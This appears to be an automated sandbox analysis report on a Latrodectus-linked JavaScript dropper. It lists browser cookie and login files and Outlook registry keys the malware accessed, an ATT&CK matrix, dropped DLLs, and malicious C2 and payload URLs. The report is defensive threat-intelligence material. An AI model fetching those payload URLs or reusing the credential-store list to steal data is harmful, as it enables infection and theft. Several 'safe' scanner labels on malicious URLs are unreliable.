Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Remote Access Functionality

Yara detected Latrodectus

Source: Yara match	File source: 7.2.rundll32.exe.1ef532b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.235b4340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.235b5ce0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.235b4340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1ef532a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1ef532b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1ef532a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.235b5ce0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.2983475717.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2790656279.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2738493222.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2983528800.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2934278162.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3043571681.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1683586362.00000235B4340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1715800687.000001EF532A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2995791620.0000018010010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2856871010.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1715838763.000001EF532B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2656498432.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7784, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	1 Valid Accounts	131 Windows Management Instrumentation	2 Scripting	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	1 Replication Through Removable Media	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	3 Obfuscated Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Valid Accounts	1 Valid Accounts	1 DLL Side-Loading	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	11 Windows Service	11 Access Token Manipulation	1 File Deletion	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Scheduled Task/Job	11 Windows Service	121 Masquerading	LSA Secrets	49 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	112 Process Injection	1 Valid Accounts	Cached Domain Credentials	491 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	12 Virtualization/Sandbox Evasion	DCSync	12 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Access Token Manipulation	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	112 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Rundll32	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	Embedded Payloads	Keylogging	21 System Network Configuration Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Document_a51_19i793302-14b09981a5569-3684u8.js	18%	ReversingLabs	Script-JS.Trojan.Cryxos

Dropped Files

Source	Detection	Scanner	Label
:wtfbbq (copy)	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\sharepoint\360total.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Windows\Installer\MSI181.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI54.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIA3.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIC4.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIFFD6.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
https://grizmotras.com/E0#W	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/dll	0%	Avira URL Cloud	safe
https://grizmotras.com/live/URLS1https://pewwhranet.com/live/	0%	Avira URL Cloud	safe
https://grizmotras.com/live/S	0%	Avira URL Cloud	safe
https://startmast.shop/live/	0%	Avira URL Cloud	safe
https://grizmotras.com/live/ras.com/live/	0%	Avira URL Cloud	safe
https://pewwhranet.com/	0%	Avira URL Cloud	safe
http://146.19.106.236/neo.msi	0%	Avira URL Cloud	safe
https://jarinamaers.shop/?	0%	Avira URL Cloud	safe
https://jarinamaers.shop/files/stkm.bin	0%	Avira URL Cloud	safe
https://pewwhranet.com/Pb	0%	Avira URL Cloud	safe
https://pewwhranet.com/4g9V	0%	Avira URL Cloud	safe
https://pewwhranet.com/live/	0%	Avira URL Cloud	safe
https://pewwhranet.com/d	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/(y	0%	Avira URL Cloud	safe
https://grizmotras.com/live/	0%	Avira URL Cloud	safe
https://grizmotras.com/Li	0%	Avira URL Cloud	safe
https://pewwhranet.com/=0	0%	Avira URL Cloud	safe
https://pewwhranet.com/live/My	0%	Avira URL Cloud	safe
https://grizmotras.com/live/l	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/J$=W	0%	Avira URL Cloud	safe
https://grizmotras.cH	0%	Avira URL Cloud	safe
http://secure.globalsign	0%	Avira URL Cloud	safe
http://146.19.106.236/neo.msi-995103104311030230	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/s6	0%	Avira URL Cloud	safe
http://cacerts.di	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/l	0%	Avira URL Cloud	safe
https://grizmotras.com/live/hy	0%	Avira URL Cloud	safe
https://grizmotras.com/	0%	Avira URL Cloud	safe
ftp://ftp%2desktop.ini	0%	Avira URL Cloud	safe
https://grizmotras.com/w	0%	Avira URL Cloud	safe
https://grizmotras.com/es	0%	Avira URL Cloud	safe
https://pewwhranet.com/live/ll	0%	Avira URL Cloud	safe
http://secure.globalsign)	0%	Avira URL Cloud	safe
https://jarinamaers.shop/	0%	Avira URL Cloud	safe
http://146.19.106.236/neo.msi0	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/P	0%	Avira URL Cloud	safe
https://grizmotras.com/H	0%	Avira URL Cloud	safe
https://pewwhranet.c	0%	Avira URL Cloud	safe
https://jarinamaers.shop/live/OIDV6SW/	0%	Avira URL Cloud	safe
https://pewwhranet.com/(h)W$	0%	Avira URL Cloud	safe
http://crl3.digic	0%	Avira URL Cloud	safe
https://grizmotras.com/live/rW	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
jarinamaers.shop	104.21.46.75	true	true	unknown
pewwhranet.com	172.67.197.34	true	true	unknown
grizmotras.com	172.67.219.28	true	true	unknown
www.google.com	142.250.217.228	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://146.19.106.236/neo.msi	false	Avira URL Cloud: safe	unknown
https://startmast.shop/live/	true	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/files/stkm.bin	true	Avira URL Cloud: safe	unknown
https://pewwhranet.com/live/	true	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/	true	Avira URL Cloud: safe	unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://jarinamaers.shop/live/	true	Avira URL Cloud: safe	unknown
https://www.google.com/async/newtab_promos	false		high
https://www.google.com/async/ddljson?async=ntp:2	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGLizsLEGIjAYi0E5THM4aIj8FUOrJpdUpPAhU1RG5ebUtVLBNvumYZ4qVuqJu7WbwqMCr0qqjPIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGLizsLEGIjBzxD8y3zpVM4rvYXOzD0wZHGfxDV2C93K9X3HWoqlaBUqfM3Uck6U5jewh4t8bDhoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://pewwhranet.com/	rundll32.exe, 00000006.00000003.7220266722.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5112685854.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7266051394.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5241324561.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7177265996.000001800FF4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4830897294.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4788197767.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5491239719.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6521086402.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7263170002.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/dll	rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/S	rundll32.exe, 00000006.00000003.4787731986.000001800FF11000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pconf.f.360.cn/safe_update.php	rundll32.exe	false		high
https://grizmotras.com/E0#W	rundll32.exe, 00000006.00000003.2994803348.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/ras.com/live/	rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/?	rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/URLS1https://pewwhranet.com/live/	rundll32.exe, 00000006.00000003.2983176378.0000018010110000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/(y	rundll32.exe, 00000006.00000003.2903428713.000001800DFC9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pewwhranet.com/live/My	rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pewwhranet.com/4g9V	rundll32.exe, 00000006.00000003.5965951373.000001800FF41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pewwhranet.com/Pb	rundll32.exe, 00000006.00000003.6962520365.000001800FF45000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pewwhranet.com/=0	rundll32.exe, 00000006.00000003.5112685854.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5241324561.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4830897294.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5491239719.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dr.f.360.cn/scanlist	rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr	false		high
https://pewwhranet.com/d	rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6307126333.000001800FF28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/Li	rundll32.exe, 00000006.00000003.7266051394.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/l	rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/J$=W	rundll32.exe, 00000006.00000003.2903428713.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://secure.globalsign	wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.cH	rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6521086402.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6307126333.000001800FF28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.di	wscript.exe, 00000000.00000002.1723806957.0000023BEBD70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/s6	rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2790535697.000001800E002000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://146.19.106.236/neo.msi-995103104311030230	~DF41638D872A10A065.TMP.1.dr	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/hy	rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/l	rundll32.exe, 00000006.00000003.2790535697.000001800DFC9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903428713.000001800DFC9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2749690995.000001800DFD0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
ftp://ftp%2desktop.ini	rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr	false	Avira URL Cloud: safe	low
https://grizmotras.com/	rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://146.19.106.236/neo.msi0	~DFA850122BA55067CF.TMP.1.dr, ~DFF122760D5CC42A2E.TMP.1.dr, ~DFA3E2CC6CAB1B816A.TMP.1.dr, inprogressinstallinfo.ipi.1.dr, ~DF2C17C88212509880.TMP.1.dr, ~DF61773DAED613FFB9.TMP.1.dr	false	Avira URL Cloud: safe	unknown
https://pewwhranet.com/live/ll	rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/es	rundll32.exe, 00000006.00000003.2994803348.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/w	rundll32.exe, 00000006.00000003.5750316850.000001800FF29000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/P	rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/	rundll32.exe, 00000006.00000003.2903428713.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2749690995.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903428713.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2790535697.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://pscan.f.360.cn/safe_update.php	rundll32.exe	false		high
http://secure.globalsign)	wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.thawte.com/cps0/	MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	false		high
http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie	rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr	false		high
https://jarinamaers.shop/live/OIDV6SW/	rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/repository0W	MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	false		high
https://grizmotras.com/H	rundll32.exe, 00000006.00000003.5750316850.000001800FF2C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://sconf.f.360.cn/client_security_conf	rundll32.exe	false		high
http://crl3.digic	wscript.exe, 00000000.00000002.1723806957.0000023BEBD70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dr.f.360.cn/scan	rundll32.exe	false		high
https://www.advancedinstaller.com	MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	false		high
https://pewwhranet.c	rundll32.exe, 00000006.00000003.7220266722.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7177265996.000001800FF4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pewwhranet.com/(h)W$	rundll32.exe, 00000006.00000003.7266051394.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7263170002.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/rW	rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.217.228	www.google.com	United States	15169	GOOGLEUS	false
